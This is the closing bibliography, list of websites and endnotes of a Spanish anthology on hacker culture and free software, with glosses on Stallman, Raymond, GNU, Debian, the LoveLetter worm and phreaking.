Castells, Manuel, La galaxiaInternet. Madrid, Areté, 2001.

Ferrer, Christian, Mal de ojo: eldrama de la mirada. Buenos Aires,Colihue, 1996.

Himanen, Pekka, La ética del

Page 765: Internet, hackers y software li   varios

hacker y el espíritu de la era de lainformación. Barcelona, Destino, 2002(hay reimpresión argentina).

Ríos, Rubén H., Ríos, Rubén H., Laconspiración hacker: los robinhoods dela cibercultura. Buenos Aires,Longseller, 2003.

Zizek, Slavoj, «El hombre nuevo»,en Página/12, 1.º de junio de 2003.Suplemento Radar, pp. 2-7 (hay versiónen internet:http://www.pagina12web.com.ar/suplementos/radar/vernota.php?

id_nota=766&sec=9 ).«Multiculturalismo o la lógica

cultural del capitalismo multinacional»,en Jameson, F. y Zizek, S., Estudios

Page 766: Internet, hackers y software li   varios

culturales: reflexiones sobre elmulticulturalismo. Buenos Aires,Paidós, 1998. pp. 137-188.

Sitios y páginas

Sitio del grupo de hackers alemánCult of the dead cow, activo desde1984.http://www.cultdeadcow.com/

Sitio italiano con gran cantidad deartículos y libros sobre hackers.http://www.dvara.net/HK/index.asp

Página del hacker italiano jaromil.Pueden bajarse los programas que

Page 767: Internet, hackers y software li   varios

desarrolla: HasciiCam, MuSE, FreeJ ydyne:bolic.http://www.rastasoft.org/

Portal del que participan diversoscolectivos de acción política de España.Servidor, entre otras publicaciones, deSuburbia con noticias y debates sobrepolítica y tecnología. Biblioteca virtual:http://sindominio.net/biblioweb/

http://sindominio.net/Sitio de Fernando Bonsembiante.

Puede bajarse una copia del libroLlaneros Solitarios y la colección de larevista Virus. www.ubik.to

Via Libre,http://vialibre.org.ar/

Page 768: Internet, hackers y software li   varios

Wired, Sitio de la revistanorteamericana Wiredhttp://www.wired.com/

Page 769: Internet, hackers y software li   varios

Notas

Page 770: Internet, hackers y software li   varios

[1]Sistema operativo del que derivaLinux. < <

Page 771: Internet, hackers y software li   varios

[2]Enhttp://www.sindominio.net/biblioweb/telematica/command_es

< <

Page 772: Internet, hackers y software li   varios

[3]La ética de los hackers y el espíritu dela era de la información. Barcelona,Destino, 2002 (hay reimpresiónargentina). < <

Page 773: Internet, hackers y software li   varios

[4]La primera computadora fabricada en1945 en la Universidad de Pennsylvania,estados Unidos. Ocupaba una habitacióny pesaba treinta toneladas. (N. del T.)<<

Page 774: Internet, hackers y software li   varios

[5]La época de las computadoras quesólo podían procesar información y nointer-actuaban con los usuarios entiempo real. (N. del T.). <<

Page 775: Internet, hackers y software li   varios

[6]La Jargon File (Archivo de Argot, oJerga) es una recopilación armadacolectiva-mente por hackers de términosque utilizan para hablar de su trabajo, yque tam-bién incluye historias yanécdotas de hackers famosos. Lacantidad de nuevas expresiones,metáforas y juegos de palabras quecontiene, descriptas e historizadas converdadero amor filológico, podríanllenar las páginas de un diccionariomediano. Su origen se remonta aprincipios de los ‘70, cumpliendo el rolde herencia común del ámbito hacker.Su editor actual es Eric S. Raymond

Page 776: Internet, hackers y software li   varios

http://www.catb.org/~esr/jargon/

(N. del T.). <<

Page 777: Internet, hackers y software li   varios

[7] Un póster colgado en muchoslaboratorios de Computación, queparodiaba a los avisos de advertencianazis (ver Jargon File). (N. del T.). <<

Page 778: Internet, hackers y software li   varios

[8]Minicomputadoras que eran versionesreducidas de las viejas centrales, peroaún de tamaño considerable, similar alde una heladera, (N. del T.). <<

Page 779: Internet, hackers y software li   varios

[9]O sea, de Recursos Compartidoscomo otros sistemas operativos, peroNo-Compatible, por ser mucho mejorque los demás. (N. del T.). <<

Page 780: Internet, hackers y software li   varios

[10]Lenguaje de bajo nivel, muy técnico ydifícil de leer y escribir. (N. del T.). <<

Page 781: Internet, hackers y software li   varios

[11]El creador de este programa fueRichard Stallman. (N. del T.). <<

Page 782: Internet, hackers y software li   varios

[12]Las nuevas computadoras personales(Apple, PC, Spectrum, Commodore,etc.) (N. del T.). < <

Page 783: Internet, hackers y software li   varios

[13] Computadoras de alto rendimientoorientadas a funciones específicas(gráficos,cálculos complejos, etc.). (N.del T.) < <

Page 784: Internet, hackers y software li   varios

[14] El texto original de un programaescrito por sus programadores. Esesencial para saber cómo funciona, yaprender de él (N. del T.). <<

Page 785: Internet, hackers y software li   varios

[15]O sea, exento de derechos de autor ycon su código fuente disponible paratodos, por lo que se permite hacercopias y modificarlo. Ver la segundasección de este volumen. (N. del T.). <<

Page 786: Internet, hackers y software li   varios

[16] El núcleo de instrucciones másimportantes de un sistema operativo. (N.del T.). <<

Page 787: Internet, hackers y software li   varios

[17]Internet existía desde fines de los‘60, pero los protocolos para páginasweb aparecen a principios de los ‘90.<<

Page 788: Internet, hackers y software li   varios

[18]Este texto de Raymond se encuentraen AA.VV., Open Sources: Voices fromthe open source revolution, Sebastopol(EE.UU), O'Reilly, 1999 (versión eninternet:http://www.oreilly.com/catalog/opensources/book/ray

mond2.html , así como también en laedición ampliada de su The Cathedral& the Bazaar : Musings on Linux andOpen Sourse by an AccidentalRevolutionary. Sebastopol, O'Reilly,2001 (versión en internet:http://www.catb.org/~esr/writings/cathedral-

bazaar/ ). [hay trad. cast. enelaboración de la compilación Open

Page 789: Internet, hackers y software li   varios

Sources en TLDP-ES/LuCAS(Hispalinux); verhttp://es.tldp.org/htmls/proy-

opensources.html ] (N. del E.). < <

Page 790: Internet, hackers y software li   varios

[19]El empeño por crear procesoscomputacionales cada vez másmecanizados y «autoconstructivos» nosofrece algunos ejemplos de esos límites,que son los de la lógica. Gracias algenial matemático Kurt Gödel, seconocen bien algunos de esos límites enla noción de recursión, partefundamental de la informática moderna.Uno de ellos es la irresolubilidad del«problema de la detención», queconsiste en decidir, dado un ordenadorarbitrario provisto de un programa y deunos datos arbitrarios, si llegará adetenerse o si quedará atrapado en un

Page 791: Internet, hackers y software li   varios

bucle infinito. Otro es la demostraciónde que ningún programa que no altere elsistema operativo de un ordenador serácapaz de detectar todos los programasque sí lo hagan (por ejemplo, los virus).<<

Page 792: Internet, hackers y software li   varios

[20] O sea, basado en dos estados,conocidos universalmente como «bits»(binary digits). La lógica binaria no esuna limitación ontológica de lasmáquinas, de hecho algunos de losprimeros ordenadores, como el ENIAC,operaban en base 10. Si los ordenadoresse construyen con arquitectura biestablees porque resultan mucho más sencillosy baratos de fabricar que si ese mismohardware estuviese obligado ainstanciar diez estados distintos. <<

Page 793: Internet, hackers y software li   varios

[21]A lo largo de este artículo usaré eltérmino hacker no en el sentido masmediático y distorsionado de «piratainformático», sino en su acepciónoriginal, tal y como la define porejemplo Eric Raymond: Existe unacomunidad, una cultura compartida, deprogramadores expertos y gurús deredes, cuya historia se puede rastreardécadas atrás, hasta las primerasminicomputadoras de tiempocompartido y los primigeniosexperimentos de ARPAnet. Losmiembros de esta cultura acuñaron eltérmino hacker. Los hackers

Page 794: Internet, hackers y software li   varios

construyeron la Internet. Los hackershicieron del sistema operativo UNIX loque es en la actualidad. Los hackershacen andar USENET. Los hackershacen que funcione la WWW. Si tú eresparte de esta cultura, si tú hascontribuido a ella y otra gente te llamahacker, entonces tú eres unhacker. <<

Page 795: Internet, hackers y software li   varios

[22] Muchos programadores estándescontentos con la comercializaciónde software de sistema. Esta puedepermitirles ganar más dinero, pero lesrequiere sentirse en conflicto con otrosprogramadores en general en vez desentirse como camaradas. El actofundamental de amistad entreprogramadores es el compartirprogramas; ahora se usan típicamentearreglos de marketing que en esenciaprohíben a los programadores tratar aotros como sus amigos.

El comprador de software debeescoger entre la amistad y la

Page 796: Internet, hackers y software li   varios

obediencia a la ley. Naturalmente,muchos deciden que la amistad es másimportante. Pero aquellos que creen enla ley a menudo no se sienten bien conninguna de las dos opciones. Sevuelven cínicos y piensan que laprogramación es sólo otra forma dehacer dinero. (R. Stallman, «ElManifiesto GNU», 1985 enhttp://www.gnu.org/gnu/manifesto.es.html

Page 797: Internet, hackers y software li   varios

[23] Considero que la regla de oro meobliga a que si me gusta un programalo deba compartir con otra gente aquien le guste. Los vendedores desoftware quieren dividir a los usuariosy conquistarlos, haciendo que cadausuario acuerde no compartir susoftware con otros. Yo me niego aromper mi solidaridad con otrosusuarios de esta manera. No puedo enbuena conciencia firmar un acuerdo deno divulgación [nondisclosureagreement] o un acuerdo de licencia desoftware. (R. Stallman, «ElManifiesto GNU») <<

Page 798: Internet, hackers y software li   varios

[24] Extraer dinero de los usuariospor un programa con base en larestricción del uso que se le dé esdestructivo porque las restriccionesreducen la cantidad y las formas enque el programa puede ser utilizado.Esto reduce la cantidad de riqueza quela humanidad deriva del programa.Cuando se opta deliberadamente porrestringir, las consecuencias dañinasson destrucción deliberada.

La razón por la que un buenciudadano no utiliza estos mediosdestructivos para volverse más rico esque, si todos lo hicieran, podríamos

Page 799: Internet, hackers y software li   varios

empobrecernos todos por ladestrucción mutua. Esta es éticakantiana; o la Regla de Oro. (R.Stallman, «El Manifiesto GNU»)< <

Page 800: Internet, hackers y software li   varios

[25]Esta historia la narra con detalle elpropio Stallman en «The GNUOperating System and the Free SoftwareMovement», en AA.VV., Open Sources:Voices from the open source revolution,Sebastopol [EE.UU], O’Reilly &Associates, 1999 [hay versión eninternet:http:/www.sindominio.net/biblioweb/telematica/open-

sources-html/node42.html] .< <

Page 801: Internet, hackers y software li   varios

[26]Hay varias traducciones no oficialesal castellano de la Licencia PúblicaGeneral de GNU, por ejemplo enhttp://lucas.hispalinux.es/Otros/gples/gples.html

Puede leerse la versión original eninglés (única con valor legal) enhttp://www.gnu.org/licenses/gpl.html

Page 802: Internet, hackers y software li   varios

[27]

http://www.freebsd.org/copyright/

<<

Page 803: Internet, hackers y software li   varios

[28]El Proyecto Debian nació bajo losauspicios de la Free SoftwareFoundation en 1993, con el objetivo dejuntar la piezas GNU y construir unsistema operativo libre completo. Hoydía es un proyecto independiente de laFSF pero mantiene sus objetivosfundacionales, lo cual la hace totalmentesingular dentro de las distribucionesGNU/Linux: es la única basadaexclusivamente en software libre y es laúnica de carácter no comercial. Debianse mantiene y desarrolla de maneradistribuida mediante la cooperacióndesinteresada de más de 300 hackers de

Page 804: Internet, hackers y software li   varios

todo el mundo y dispone de unacomunidad de miles de usuarioscoordinados a través de más decincuenta listas de correo públicasextraordinariamente activas. < <

Page 805: Internet, hackers y software li   varios

[29]

http://www.netcraft.com/survey/

<<

Page 806: Internet, hackers y software li   varios

[30]Un caso paradigmático ha sido elarchifamoso gusano LoveLetter (alias«Iloveyou»), que infectó a variosmillones de ordenadores conectados aInternet a principios de mayo de 2000.Con un despliegue a partes iguales desensacionalismo e ignorancia, lasportadas de los medios de comunicaciónde todo el mundo se hicieron eco de estehecho como de un problema que poníade manifiesto una supuesta falta deseguridad de Internet.Ni ellos ni ninguno de losautodenominados expertos de empresasantivirus señalaron en ningún caso que

Page 807: Internet, hackers y software li   varios

el «peligrosísimo virus» era un sencilloscript de menos de 300 líneas escrito enVisualBasic, inocuo por tanto para lastres cuartas partes de los servidores deInternet, basados en sistemas UNIX.Para eludir toda responsabilidad,Microsoft insistía en que no se tratabade ningún error de diseño en susaplicaciones. De ese modo y sinadvertirlo, Microsoft estabareconociendo implícitamente que elgusano «I love you» no explotabaagujero alguno, simplementeaprovechaba las facilidades inherentes ala concepción de Windows: es puesMicrosoft, y no Internet, el que convierte

Page 808: Internet, hackers y software li   varios

las PC caseras en absolutamenteinseguras y pone los datos de susincautos usuarios al alcance del másinexperto script kiddy.<<

Page 809: Internet, hackers y software li   varios

[31] http://es.tldp.org/Otros/catedral-

bazar/cathedral-es-paper-

00.html#toc1/ . <<

Page 810: Internet, hackers y software li   varios

[32]Nombre desafortunado para describirel fenómeno, pues la construcción de lascatedrales góticas se debía a loscompagnons, colectivos nómadas eitinerantes del tipo albañiles,carpinteros, herreros, etc. que lasconstruían aquí y allá, diseminando lasobras, sin división entre trabajo manuale intelectual y con una planificación yconstrucción descentralizada yautónoma: Al plano sobre el suelodel compagnon gótico se opone elplano métrico sobre el papel delarquitecto exterior a la obra. (GillesDeleuze y Félix Guattari, Mil mesetas,

Page 811: Internet, hackers y software li   varios

Valencia, Pre-Textos, 1988). Sería puesmás exacto denominar «modelopirámide» o «modelo rascacielos» almodelo jerárquico y planificado quedescribe Raymond en su artículo. < <

Page 812: Internet, hackers y software li   varios

[33] En el plano de los procesosproductivos y de las formas de mandosobre la cooperación social, algunascorrientes de pensamiento denominanposfordismo al conjunto detransformaciones que a partir demediados de los años setenta conducen ala informatización de lo social, laautomatización en las fábricas, eltrabajo difuso, la hegemonía crecientedel trabajo inmaterial, del generalintellect y del llamado terciario(comunicativo, cognitivo y científico,performativo, afectivo) y laglobalización de los procesos

Page 813: Internet, hackers y software li   varios

productivos. <<

Page 814: Internet, hackers y software li   varios

[34]En los Grundrisse, texto queprefigura nuestra época con más de cienaños de antelación, Karl Marx recurre altérmino general intellect (o «intelectogeneral») para designar el conjunto delos conocimientos abstractos (de«paradigmas epistemológicos»,diríamos hoy) que, al mismo tiempo,constituyen el epicentro de laproducción social y organizan todo elcontexto de la vida. Un cerebro ointelecto general, basado en lacooperación y el saber abstracto,incluyendo el saber científico, quetiende a volverse, en virtud

Page 815: Internet, hackers y software li   varios

precisamente de su autonomía enrelación a la producción, ni más nimenos que la principal fuerzaproductiva, relegando a una posiciónmarginal al trabajo parcelizado yrepetitivo de la producción industrial. <<

Page 816: Internet, hackers y software li   varios

[35] De hecho, mucha gente va aprogramar sin absolutamente ningúnincentivo monetario. La programacióntiene una fascinación irresistible paraalgunas personas, generalmente paralas mejores en el ramo. (R. Stallman,«El Manifiesto GNU»). < <

Page 817: Internet, hackers y software li   varios

[36]Ver por ejemplo el artículo de JuanAntonio Martínez, «Software libre: unaaproximación desde la teoría dejuegos», en Linux Actual, Nº 11. < <

Page 818: Internet, hackers y software li   varios

[37]Los creadores del «dilema delprisionero» lo ilustraron así: dospersonas detenidas y sospechosas decometer un delito son puestas en celdasseparadas e interrogadas. Cada uno esinvitado a traicionar a su colega,convirtiéndose en un arrepentido.Lo que suceda depende de lo que haganambos prisioneros y ninguno sabe lo queha dicho el otro. Si los dos se callan (esdecir, si cooperan entre sí, según lateoría de juegos), serán condenados auna pena mínima de un año por falta depruebas. Si se denuncian uno al otro (esdecir, no cooperan entre sí, según la

Page 819: Internet, hackers y software li   varios

teoría de juegos) cumplirán una pena detres años.Pero si sólo uno denuncia al otro,recibirá una recompensa (y quedarálibre), mientras que su cómplice sepudrirá entre rejas durante cinco años.Ante este dilema suponiendo que ambosestán motivados por el interés racional yque no pueden hablarse para pactar entresí parece que la única opción racionales acusarse mutuamente para minimizarla pena (será liberado si su cómplice secalla y cumplirá tres años si habla; encambio pueden caerle cinco años sicalla y su cómplice habla).La opción más racional les hará

Page 820: Internet, hackers y software li   varios

acusarse mutuamente y recibir una penamayor. A menos que el jugador sea unincauto, tendrá que descartar la soluciónmás deseable para ambos lacooperación (o sea permanecercallados)—. Este dilema sin salida havuelto locos a generaciones de teóricosde juegos, y solo con una variantellamada el «dilema del prisionerorepetido», que consiste en poderlo jugarvarias veces y observar elcomportamiento del otro, encontraronuna condición de salida.<<

Page 821: Internet, hackers y software li   varios

[38]Ver la obra de Richard Dawkins, Elgen egoísta, publicado en su segundaedición [en inglés] en 1989 [trad. cast.:Barcelona, Salvat, 1993]. Especialmenterelevante para este asunto es el capítulo«Los buenos chicos acaban primero».<<

Page 822: Internet, hackers y software li   varios

[39]Juan Antonio Martínez, op. cit. <<

Page 823: Internet, hackers y software li   varios

[40] Todas las confusiones yparcialidades que aparecen en losartículos de Eric Raymond son típicosde su elección de la «política real»como principio de actuación en suactivismo en pro del software libre.

Un ejemplo de esta elección eshaber cambiado con efectosretroactivos en sus artículos yconferencias el término software librepor open source. No discrepo de lanoción de ser eficaz promoviendo elsoftware libre. Pero me opongo aacciones que pueden resultar atajosválidos a corto plazo y causar

Page 824: Internet, hackers y software li   varios

perjuicios a la larga, ya que en estoscasos, en la búsqueda de un éxitopuntual, se opta por apoyar fenómenosesencialmente erróneos en lugar decombatirlos. (François René Rideau,«Sobre los artículos de Eric S.Raymond», 1998). <<

Page 825: Internet, hackers y software li   varios

[41] Es posible que a largo plazotriunfe la cultura del software libre, noporque la cooperación es moralmentecorrecta o porque la «apropiación» delsoftware es moralmente incorrecta(suponiendo que se crea realmente enesto último, lo cual no es cierto ni paraLinus ni para mí), sino simplementeporque el mundo comercial no puedeganar una carrera de armamentosevolutiva a las comunidades desoftware libre, que pueden ponermayores órdenes de magnitud detiempo calificado en un problema quecualquier compañía. (Eric Raymond,

Page 826: Internet, hackers y software li   varios

La catedral y el bazar). <<

Page 827: Internet, hackers y software li   varios

[42] No hay escasez de músicosprofesionales que sigan en lo suyoaunque no tengan esperanzas deganarse la vida de esta forma. […]Durante más de diez años, varios de losmejores programadores del mundotrabajaron en el Laboratorio deInteligencia Artificial [del MIT] pormucho menos dinero del que podíanganar en otras partes. Ellos obteníanvarios tipos de premios no monetarios:fama y aprecio, por ejemplo. Y lacreatividad también se disfruta, es unpremio en sí mismo. (RichardStallman, «El Manifiesto GNU»). <<

Page 828: Internet, hackers y software li   varios

[43] Como no me gustan lasconsecuencias que resultan si todosacapararan información, deboconsiderar como erróneo que alguienlo haga. Específicamente, el deseo deser recompensado por la creatividad deuno no justifica el privar al mundo engeneral de toda o parte de esacreatividad. (Richard Stallman, «ElManifiesto GNU», 1985).<<

Page 829: Internet, hackers y software li   varios

[44]Un admirado hacker, que coordina unestratégico proyecto de software libre,me comentaba en privado recientementeque hasta hace un año se levantaba porla mañana y se ponía a escribir lo que leapetecía o si no le apetecía no escribíanada. Ahora, en su empresa, él siguetrabajando con software libre perocuando se levanta por la mañana debeconsultar su agenda y ponerse a escribirlo que le piden sus clientes. Aunque enambos casos, antes y ahora, estáproduciendo software libre, ladiferencia a su juicio es muy notable.< <

Page 830: Internet, hackers y software li   varios

[45]Ver artículo de Aris Papathéodorou yLaurent Moineau, «Coopération etproduction immaterielle dans le logiciellibre», en Multitudes, Nº1, marzo de2000 (hay versión en internet:http://multitudes.samizdat.net/article.php3?

id_article=212&var_recherche=Papatheodorou/)

[hay trad. cast.:«Cooperación yproducción inmaterial en el softwarelibre»,http://sindominio.net/biblioweb/telematica/cooperacion.html]

< <

Page 831: Internet, hackers y software li   varios

[46]No es solo una metáfora: un«troyano», en este contexto, sería un tipoparticular de meme. El meme sería laidea del mercado como motor de laeconomía y dinamizador del softwarelibre. En esa hipótesis, el troyanoincorporado en el meme lo «vampiriza»,se propaga con él, y acabaríareduciendo el software libre a una piezamás del gran supermercado global enque se está convirtiendo gran parte deInternet.<<

Page 832: Internet, hackers y software li   varios

[47] Las leyes de propiedadintelectual han corrompidocompletamente las institucioneseconómicas, ya que muchascorporaciones dependen de un modocrucial del monopolio de lainformación, también en el origen degrandes fortunas, más que de laprestación de servicios reales. Nodeben realizarse compromisos conestas leyes, y debe lucharse contra sujustificación, habitualmente errónea.Este es el principio fundamental de lafilosofía del software libre. […] Esdifícil luchar contra prejuicios que

Page 833: Internet, hackers y software li   varios

sirven para justificar enormesintereses financieros, por supuesto.Hace falta ser muy estrictoprecisamente porque la tarea es muydura. (François René Rideau, «Sobrelos artículos de Eric S. Raymond»).<<

Page 834: Internet, hackers y software li   varios

[48]>Eudald Carbonell y Robert Sala,Planeta humà, Barcelona, Empúries,2000 [hay trad. cast.: Planeta humano.Barcelona, Península, 2000]. <<

Page 835: Internet, hackers y software li   varios

[49]Software Publisher’s Association(Asociación de Editores de Software).Al igual que la BSA (BussinessSoftware Alliance) que se comporta entérminos estrictos como unaorganización parapolicial es yalegendaria la beligerancia de la SPAcontra la llamada «piratería»: ejercetodo tipo de presiones, mentiras yamenazas que luego sirven de modelo aaprendices de policías como la SGAEespañola invita a la gente a informarsobre sus compañeros y amigos, ypromueve una política de«responsabilización», en la que los

Page 836: Internet, hackers y software li   varios

dueños de ordenadores deben hacecumplir activamente las leyes decopyright, si no quieren ser castigados.En 1996 en su clásico «El derecho aleer» (enhttp://sindominio.net/biblioweb/telematica/derecho_leer.html

el propio Stallman ya avisaba de cómola SPA estaba amenazando a pequeñosproveedores de Internet, exigiéndolesque les permitieran espiar a sususuarios. Muchos provee dores serinden cuando les amenazan, porque nopueden permitirse litigar en lotribunales. [M.V.] <<

Page 837: Internet, hackers y software li   varios

[50]Evidentemente Stallman peca aquí demodestia pues es mucho más que un«notable programador»: suyas sonalgunas de las mejores piezas desoftware hoy existentes, como el editorEmacs, el compilador GCC y eldepurador GDB. [M.V.]. < <

Page 838: Internet, hackers y software li   varios

[51] Stallman se dedicó extensamente ademostrar esta idea que el copyright esun derecho artificial que viene a regularel derecho natural a la copia en laconferencia que ofreció en julio de 2000en la Universidad de Burdeos, en elmarco de la Conferencia de Debian, yque llevaba por título: «El copyrightcontra la comunidad en la era de lasredes de ordenadores». Existetraducción castellana enhttp://sindominio.net/biblioweb/telematica/stallman-

copyright.html . [M.V] < <

Page 839: Internet, hackers y software li   varios

[52]En inglés, la polisemia del términofree obliga a insistir en este punto ydeshacer la ambigüedad. En castellanodisponemos de dos palabras libre ygratis, pero muchas traducciones seencargan lamentablemente de mantenerla confusión y aun agravarla al traducirfree por «gratis», totalmente erróneo eneste contexto:existe software gratuito que espropietario (el navegador MicrosoftExplorer, por ejemplo) y nada impidevender el software libre, aunqueciertamente se debe ofrecer algo extranormalmente en forma de servicios

Page 840: Internet, hackers y software li   varios

añadidos para que alguien compre algoque puede obtener legítimamente sinpagar por ello. La gratuidad en este casoes una consecuencia del modelo en elque el programador puede que hayacobrado por su trabajo, pero de ningúnmodo es lo que define al software libre.[M.V.]<<

Page 841: Internet, hackers y software li   varios

[53]Aunque resulte chocante a primeravista, no solo programadores sinoalgunos teóricos consideran laprogramación «una de las bellas artes»(De la programmation considéréecomme une des beaux arts esprecisamente el título de una obra dePierre Lévy). Por su parte FrancoBerardi, Bifo, afirma en «Lavoro zero»[Trabajo cero] que la programaciónpuede ser valorada no solo comoejecución de un proyecto predefinido,no como simple elaboración de losprocedimientos a través de los cualesse pone en funcionamiento un cierto

Page 842: Internet, hackers y software li   varios

proceso, sino como redefinición delcontexto mismo y como elaboración deprocedimientos afortunados.[«Lavoro zero», en DeriveApprodi, AñoII, Nº 3-4, Invierno-primavera de 1994][M.V.] <<

Page 843: Internet, hackers y software li   varios

[54]El Proyecto GNU (acrónimorecursivo que significa GNU’ s NotUNIX, o sea,«GNU No es UNIX») nacióen 1984 de la mano de RichardStallman, por entonces un hacker delemblemático Laboratorio de InteligenciaArtificial del Massachusetts InstituteTechnology (MIT), cuna de grandeshackers.El proyecto GNU se propuso a la sazónuna tarea titánica: construir un sistemaoperativo libre completo. No es sencilloexpresar en pocas palabras la enormedificultad que comporta un proyecto así,en principio sólo al alcance de unas

Page 844: Internet, hackers y software li   varios

cuantas compañías con miles deprogramadores a sueldo. [M.V.]<<

Page 845: Internet, hackers y software li   varios

[55]Cygnus fue la primera empresaimportante que trabajó con softwarelibre. Sus aportaciones a la comunidaddel software libre liberando código ymanteniendo herramientas críticas comoel compilador C de GNU han sidonumerosas e importantes. En 1999 fueadquirida por Red Hat, una grancompañía que basa por completo sumodelo de negocio en el software libre.(N. del E.). <<

Page 846: Internet, hackers y software li   varios

[56]La financiación de la Fuerza Aérea seacabó hace algún tiempo; el CompiladorGNU de Ada está ahora en servicio, y sumantenimiento se financiacomercialmente. (N. del E.) <<

Page 847: Internet, hackers y software li   varios

[57] Desde que Stallman revisó esteartículo por última vez, hace apenas tresaños, la situación ha cambiadosobremanera y se han multiplicado lasiniciativas comerciales, que ya no sontan «modestas» como las que citaba: entorno al software libre han surgidocientos de nuevas empresas, hasta elpunto de convertirse en los dos últimosaños en uno de los sectores másdinámicos del ya de por sí dinámicosector informático. Muchas de esasempresas mantienen modelos de negociotradicionales basados en la prestaciónde servicios, pero otras están abriendo

Page 848: Internet, hackers y software li   varios

nuevas vías.No ha faltado incluso la incursión decapital financiero y especulativo enempresas del mundo Linux, como VALinux y Red Hat, cuya salida a bolsa fueespectacular en ambos casos. [M.V.]<<

Page 849: Internet, hackers y software li   varios

[58]Se refiere a las llamadas radiospúblicas, que tienen algún parecido conlas radios libres. Para mantenerse sinnecesidad de publicidad y sin controlmediático reciben donaciones de susoyentes, que no pagan por un serviciosino por mantener en antena y sindependencias comerciales algo quecualquiera escuchará gratis. [M.V.]<<

Page 850: Internet, hackers y software li   varios

[59]La compañía de tabaco RJ Reynoldsfue multada con $1,5 millones en 2002por repartir muestras gratis decigarrillos en eventos a los que asistíanchicos menores. Verhttp://www.bbc.co.uk/worldservice/sci_tech/features/health/tobaccotrial/usa.htm

< <

Page 851: Internet, hackers y software li   varios

[60] [Stallman,] enhttp://www.gnu.org/philosophy/no-

word-attachments.html [2002] [haytrad. cast.: «Podemos acabar con losarchivos adjuntos en Word»,http://www.gnu.org/philosophy/no-

word-attachments.es.html] . < <

Page 852: Internet, hackers y software li   varios

[61] Ross Anderson, «‘TrustedComputing’ Frequently AskedQuestions» (hay trad. cast.: Preguntasfrecuentes sobre Informática Fiable,http://linuca.org/body.phtml?

nIdNoticia=207 ). (N. del. E.). < <

Page 853: Internet, hackers y software li   varios

[62] http://www.eff.org/ . <<

Page 854: Internet, hackers y software li   varios

[63]

http://www.publicknowledge.org .<<

Page 855: Internet, hackers y software li   varios

[64]

http://www.digitalspeech.org/ .<<

Page 856: Internet, hackers y software li   varios

[65] Se refiere a las operacionespoliciales contra la comunidad hackerque se habían realizado en 1990, un añoantes de la conferencia. En la larga listade abusos cometidos por la policía, secuenta el procesamiento de losempleados de una editorial de juegos derol a quienes confundieron con unabanda de hackers por el tipo deinformación que guardaban en sus discosrígidos. La historia completa de esasredadas es reconstruida por BruceSterling en Operation Crackdown(1991), junto con la historia de lastelecomunicaciones y el surgimiento del

Page 857: Internet, hackers y software li   varios

underground digital. (N.del T.) <<

Page 858: Internet, hackers y software li   varios

[66] Empresario norteamericano, dueñode una cadena de circos a comienzos delsiglo XX. (N. del T.) <<

Page 859: Internet, hackers y software li   varios

[67] National Security Agency, Agenciade Seguridad Nacional. Organismoestatal de EE.UU encargado de lacontrol y coordinación de la seguridad.Más importante y de mayor jerarquíaque la CIA. (N. del E.) <<

Page 860: Internet, hackers y software li   varios

[68] DES (Data Encryption Standard,Standard para la Encriptación de Datos).Sistema de encriptación adoptado comostandard por la administración públicade Estados Unidos. (N. del T.) <<

Page 861: Internet, hackers y software li   varios

[69]El ciberespacio es un conceptocreado por William Gibson en suextraordinaria novela de ciencia ficciónNeuromante (1984) y que fueinmediatamente adoptado por loshackers. En un sentido amplio, hacereferencia al espacio de comunicaciónabierto por la interconexión mundial delos ordenadores y de sus recursos.Esta definición (de Pierre Lévy)comprende el conjunto de sistemas decomunicación electrónicos digitales(incluyendo el conjunto de redeshertzianas y telefónicas clásicas). Un parde aclaraciones: las autopistas de la

Page 862: Internet, hackers y software li   varios

información y el ciberespacio no son lomismo: el ciberespacio se sirve de ellas(también del éter o de las líneasteléfonicas) pero no se refiere a unatecnología determinada o a Internetúnicamente, sino a un tipo particular derelación entre personas. <<

Page 863: Internet, hackers y software li   varios

[70] No hay duda de que la mayoría deestos hallazgos van siendo recuperadosy utilizados por la industria. Pero hayque reconocer que la industria tambiénha realizado, de alguna manera, losobjetivos de toda esa gente que ha idocreando herramientas y promoviendousos políticos antagonistas. Hay quesubrayar una vez más que la informáticapersonal y el mismo Internet no han sidodecididos y menos aún previstos porningún Estado ni por ningunatransnacional.Su inventor y principal motor fue unmovimiento social que se quiso

Page 864: Internet, hackers y software li   varios

reapropiar, en beneficio de las personas(«computers for the people» decían loshackers californianos de mediados delos setenta), de una potencia técnicahasta entonces monopolizada porgrandes instituciones burocráticas tantopúblicas como privadas. < <

Page 865: Internet, hackers y software li   varios

[71]Mateo Pasquinelli, en M. Pasquinelli(comp.), Mediactivismo: Estrategias yprácticas de la comunicaciónindependiente. DeriveApprodi, Roma,2002. < <

Page 866: Internet, hackers y software li   varios

[72]Franco Berardi (Bifo), «La incesanteguerra entre red y videocracia», en MPasquinelli (comp.),Mediactivismo…<<

Page 867: Internet, hackers y software li   varios

[73] Pablo Boido, Ponencia realizadapara «Our media», Colombia, julio2003. <<

Page 868: Internet, hackers y software li   varios

[74]Idem <<

Page 869: Internet, hackers y software li   varios

[75]Idem < <

Page 870: Internet, hackers y software li   varios

[76] Franco Berardi, op. cit. <<

Page 871: Internet, hackers y software li   varios

[77] Idem. <<

Page 872: Internet, hackers y software li   varios

[78] En «phreakers» se combinan trestérminos: «phone» (teléfono), «freak»(monstruo, criatura extraña) y «hacker».Se refiere a hackers que se especializanen teléfonos y comunicaciones. (N. delT.) < <

Page 873: Internet, hackers y software li   varios

[79] http://www.hack.gr/jargon/

(hay versión en papel: The NewHacker’s Dictionary. Cambridge, MITPress, 1996). (N. del. E.). <<

Page 874: Internet, hackers y software li   varios

[80]Publicación digital dehacking/phreaking/cracking editadadesde 1985. En ella participaron muchosde los hackers más famosos de EE.UU(N. del T.) <<

Page 875: Internet, hackers y software li   varios

[81] BBS (Bulletin Board System): unacomputadora conectada a una línea deteléfono, que sirve como lugar deencuentro para intercambiar mensajes yarchivos entre varios usuarios; de ahí sunombre, «buletin board» o «panel demensajes». Era la forma decomunicación más extendida entrecomputadoras antes de internet. Muchosgrupos de hackers funcionaban en tornoa estos BBS. (N. del T.). <<

Page 876: Internet, hackers y software li   varios

[82]«Crackear» aquí se refiere adesactivar la protección que incorporanlos fabricantes de software para impedirlas copias de sus programas. (N. del T.)<<

Page 877: Internet, hackers y software li   varios

[83]Howard Rheingold, Tools for thought(http://www.rheingold.com/texts/tft/

). (Hay versión en papel: Tools forthought: The History and Future ofMind-Expanding Technology.Cambridge, MIT Press, 2000.) (N. del.E.)< <

Page 878: Internet, hackers y software li   varios

[84] Ver nota en p. 128. <<

Page 879: Internet, hackers y software li   varios

